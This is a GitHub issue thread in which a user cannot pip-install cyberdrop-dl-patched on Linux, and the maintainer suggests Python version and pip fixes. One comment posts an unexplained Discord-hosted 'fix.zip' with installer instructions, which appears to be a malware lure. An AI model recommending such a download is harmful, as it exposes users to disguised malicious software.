### ISSUE TITLE
[BUG] Can't install on Linux

### ISSUE THREAD

**Issue by TheDoctor40** [jbsparrow/CyberDropDownloader#71]
**Describe the bug**
I've been a happy user of this patched version on Windows for a while now. Today I wanted to install on my Linux dual boot, but unfortunately it refuses to install. When I try to install via PIP, I get the error: `ERROR: Could not find a version that satisfies the requirement cyberdrop-dl-patched (from versions: none)`

**To Help Reproduce**
Steps to help reproduce the behavior:
1. Open a terminal
2. run `pip install cyberdrop-dl-patched`
3. Get error

**Screenshots**
![image](https://github.com/user-attachments/assets/7d01d44c-acfc-4356-a108-af0fa7fa8ba9)

**Setup Information**
 - OS: Pop!_OS 22.04 LTS
 - Cyberdrop Downloader Version # N/A bc the problem is that I can't install.

**Downloader.log file**
N/A bc install problem

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by jbsparrow** [comment]
It looks like you might have the wrong python version installed. CDL must be run on Python 3.10. Run `python3 --version` to check your version.

You can also try running `python3 -m pip install cyberdrop-dl-patched`.

It is also possible that pip is outdated. Try updating pip by running the following: `python3 -m pip install --upgrade pip`

I believe that on UNIX systems, python has two separate pip commands. `pip` for python2, and `pip3` for python3, so the cause of the issue is likely trying to install with an unsupported Python version.

**Comment by jbsparrow** [comment]
Try with Python 3.11. I believe I was wrong about running on 3.10. Jules developed on 3.10. Datawhores and I have been using 3.11 I believe.

**Comment by jbsparrow** [comment]
CDL suports Python 3.11 & Python 3.12. On my Mac I am running Python 3.12.2 and on Windows I am running Python 3.11.7. As long as you're above 3.10 it should work :)
